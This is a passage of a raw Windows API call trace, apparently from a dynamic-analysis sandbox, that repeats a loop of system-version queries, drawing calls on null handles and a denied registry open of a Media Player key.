lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.519] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.519] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.519] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.519] BeginPath (hdc=0x0) returned 0 [0017.519] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.519] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.519] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.519] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.519] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.519] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.519] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.519] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.519] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc040713 [0017.519] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x204027d [0017.519] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409dc [0017.519] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409dd [0017.519] CombineRgn (hrgnDst=0x10409dc, hrgnSrc1=0xc040713, hrgnSrc2=0x204027d, iMode=1) returned 1 [0017.519] CombineRgn (hrgnDst=0x10409dd, hrgnSrc1=0xc040713, hrgnSrc2=0x204027d, iMode=4) returned 2 [0017.519] CreateSolidBrush (color=0xff) returned 0x21009db [0017.519] CreateSolidBrush (color=0xff0000) returned 0x11009de [0017.519] DeleteObject (ho=0x11009de) returned 1 [0017.519] DeleteObject (ho=0x204027d) returned 1 [0017.519] DeleteObject (ho=0xc040713) returned 1 [0017.519] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.519] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.519] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.519] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.519] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.519] BeginPath (hdc=0x0) returned 0 [0017.519] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.519] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.519] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.519] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.519] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.519] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.520] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.520] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x304027d [0017.520] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd040713 [0017.520] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409df [0017.520] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e0 [0017.520] CombineRgn (hrgnDst=0x10409df, hrgnSrc1=0x304027d, hrgnSrc2=0xd040713, iMode=1) returned 1 [0017.520] CombineRgn (hrgnDst=0x10409e0, hrgnSrc1=0x304027d, hrgnSrc2=0xd040713, iMode=4) returned 2 [0017.520] CreateSolidBrush (color=0xff) returned 0x21009de [0017.520] CreateSolidBrush (color=0xff0000) returned 0x11009e1 [0017.520] DeleteObject (ho=0x11009e1) returned 1 [0017.520] DeleteObject (ho=0xd040713) returned 1 [0017.520] DeleteObject (ho=0x304027d) returned 1 [0017.520] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.520] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.520] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.520] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.520] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.520] BeginPath (hdc=0x0) returned 0 [0017.520] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.520] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.520] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.520] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.520] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.520] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.520] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.521] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe040713 [0017.521] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x404027d [0017.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e2 [0017.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e3 [0017.521] CombineRgn (hrgnDst=0x10409e2, hrgnSrc1=0xe040713, hrgnSrc2=0x404027d, iMode=1) returned 1 [0017.521] CombineRgn (hrgnDst=0x10409e3, hrgnSrc1=0xe040713, hrgnSrc2=0x404027d, iMode=4) returned 2 [0017.521] CreateSolidBrush (color=0xff) returned 0x21009e1 [0017.521] CreateSolidBrush (color=0xff0000) returned 0x11009e4 [0017.521] DeleteObject (ho=0x11009e4) returned 1 [0017.521] DeleteObject (ho=0x404027d) returned 1 [0017.521] DeleteObject (ho=0xe040713) returned 1 [0017.521] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.521] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.521] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.521] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.521] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.521] BeginPath (hdc=0x0) returned 0 [0017.521] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.521] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.521] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.521] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.521] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.521] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.521] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.521] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x504027d [0017.521] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf040713 [0017.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e5 [0017.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e6 [0017.521] CombineRgn (hrgnDst=0x10409e5, hrgnSrc1=0x504027d, hrgnSrc2=0xf040713, iMode=1) returned 1 [0017.521] CombineRgn (hrgnDst=0x10409e6, hrgnSrc1=0x504027d, hrgnSrc2=0xf040713, iMode=4) returned 2 [0017.521] CreateSolidBrush (color=0xff) returned 0x21009e4 [0017.522] CreateSolidBrush (color=0xff0000) returned 0x11009e7 [0017.522] DeleteObject (ho=0x11009e7) returned 1 [0017.522] DeleteObject (ho=0xf040713) returned 1 [0017.522] DeleteObject (ho=0x504027d) returned 1 [0017.522] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.522] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.522] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.522] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.522] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.522] BeginPath (hdc=0x0) returned 0 [0017.522] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.522] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.522] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.522] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.522] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.522] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.522] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.522] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.522] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10040713 [0017.522] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x604027d [0017.522] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e8 [0017.522] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e9 [0017.522] CombineRgn (hrgnDst=0x10409e8, hrgnSrc1=0x10040713, hrgnSrc2=0x604027d, iMode=1) returned 1 [0017.522] CombineRgn (hrgnDst=0x10409e9, hrgnSrc1=0x10040713, hrgnSrc2=0x604027d, iMode=4) returned 2 [0017.522] CreateSolidBrush (color=0xff) returned 0x21009e7 [0017.522] CreateSolidBrush (color=0xff0000) returned 0x11009ea [0017.522] DeleteObject (ho=0x11009ea) returned 1 [0017.522] DeleteObject (ho=0x604027d) returned 1 [0017.522] DeleteObject (ho=0x10040713) returned 1 [0017.522] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.522] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.522] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.523] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.523] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.523] BeginPath (hdc=0x0) returned 0 [0017.523] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.523] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.523] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.523] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.523] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.523] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.523] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.523] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.523] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x704027d [0017.523] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x11040713 [0017.523] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409eb [0017.523] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ec [0017.523] CombineRgn (hrgnDst=0x10409eb, hrgnSrc1=0x704027d, hrgnSrc2=0x11040713, iMode=1) returned 1 [0017.523] CombineRgn (hrgnDst=0x10409ec, hrgnSrc1=0x704027d, hrgnSrc2=0x11040713, iMode=4) returned 2 [0017.523] CreateSolidBrush (color=0xff) returned 0x21009ea [0017.523] CreateSolidBrush (color=0xff0000) returned 0x11009ed [0017.523] DeleteObject (ho=0x11009ed) returned 1 [0017.523] DeleteObject (ho=0x11040713) returned 1 [0017.523] DeleteObject (ho=0x704027d) returned 1 [0017.523] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.523] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.523] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.523] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.523] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.523] BeginPath (hdc=0x0) returned 0 [0017.523] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.523] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.523] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.523] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.523] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.523] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.524] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.524] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x12040713 [0017.524] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x804027d [0017.524] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ee [0017.524] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ef [0017.524] CombineRgn (hrgnDst=0x10409ee, hrgnSrc1=0x12040713, hrgnSrc2=0x804027d, iMode=1) returned 1 [0017.524] CombineRgn (hrgnDst=0x10409ef, hrgnSrc1=0x12040713, hrgnSrc2=0x804027d, iMode=4) returned 2 [0017.524] CreateSolidBrush (color=0xff) returned 0x21009ed [0017.524] CreateSolidBrush (color=0xff0000) returned 0x11009f0 [0017.524] DeleteObject (ho=0x11009f0) returned 1 [0017.524] DeleteObject (ho=0x804027d) returned 1 [0017.524] DeleteObject (ho=0x12040713) returned 1 [0017.524] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.524] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.524] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.524] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.524] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.524] BeginPath (hdc=0x0) returned 0 [0017.524] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.524] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.524] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.524] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.524] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.524] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.524] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.525] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x904027d [0017.525] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x13040713 [0017.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f1 [0017.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f2 [0017.525] CombineRgn (hrgnDst=0x10409f1, hrgnSrc1=0x904027d, hrgnSrc2=0x13040713, iMode=1) returned 1 [0017.525] CombineRgn (hrgnDst=0x10409f2, hrgnSrc1=0x904027d, hrgnSrc2=0x13040713, iMode=4) returned 2 [0017.525] CreateSolidBrush (color=0xff) returned 0x21009f0 [0017.525] CreateSolidBrush (color=0xff0000) returned 0x11009f3 [0017.525] DeleteObject (ho=0x11009f3) returned 1 [0017.525] DeleteObject (ho=0x13040713) returned 1 [0017.525] DeleteObject (ho=0x904027d) returned 1 [0017.525] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.525] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.525] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.525] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.525] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.525] BeginPath (hdc=0x0) returned 0 [0017.525] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.525] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.525] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.525] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.525] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.525] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.525] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.525] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.525] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x14040713 [0017.525] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa04027d [0017.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f4 [0017.525] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f5 [0017.525] CombineRgn (hrgnDst=0x10409f4, hrgnSrc1=0x14040713, hrgnSrc2=0xa04027d, iMode=1) returned 1 [0017.525] CombineRgn (hrgnDst=0x10409f5, hrgnSrc1=0x14040713, hrgnSrc2=0xa04027d, iMode=4) returned 2 [0017.525] CreateSolidBrush (color=0xff) returned 0x21009f3 [0017.525] CreateSolidBrush (color=0xff0000) returned 0x11009f6 [0017.526] DeleteObject (ho=0x11009f6) returned 1 [0017.526] DeleteObject (ho=0xa04027d) returned 1 [0017.526] DeleteObject (ho=0x14040713) returned 1 [0017.526] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.526] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.526] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.526] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.526] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.526] BeginPath (hdc=0x0) returned 0 [0017.526] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.526] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.526] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.526] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.526] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.526] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.526] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.526] RegOpenKeyExW (in: 